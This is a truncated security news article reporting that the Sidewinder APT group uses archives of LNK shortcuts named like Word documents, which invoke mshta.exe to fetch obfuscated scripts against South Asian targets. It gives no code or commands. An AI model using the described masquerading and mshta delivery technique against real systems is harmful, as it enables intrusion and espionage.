Sidewinder Hackers Exploit LNK Files to Deploy Malicious Scripts

In a striking evolution of its tactics, the Sidewinder advanced persistent threat (APT) group—also known as APT-C-24 or “Rattlesnake”—has adopted a novel delivery mechanism leveraging Windows shortcut (LNK) files to orchestrate complex, multi-stage intrusions across South Asia.

Active since at least 2012 and targeting governments, energy utilities, military installations, and mining operations in Pakistan, Afghanistan, Nepal, Bhutan, and Myanmar, Sidewinder’s latest campaign exemplifies the group’s continued innovation in stealthy espionage operations.

Security researchers at the 360 Advanced Threat Research Institute uncovered a series of compressed archives containing three malicious LNK files each.

These archives, hosted on remote servers, employ carefully crafted filenames—such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk”—to masquerade as benign documents.

When a victim executes any of these shortcuts, the Windows mshta.exe binary is invoked to fetch and execute an obfuscated ...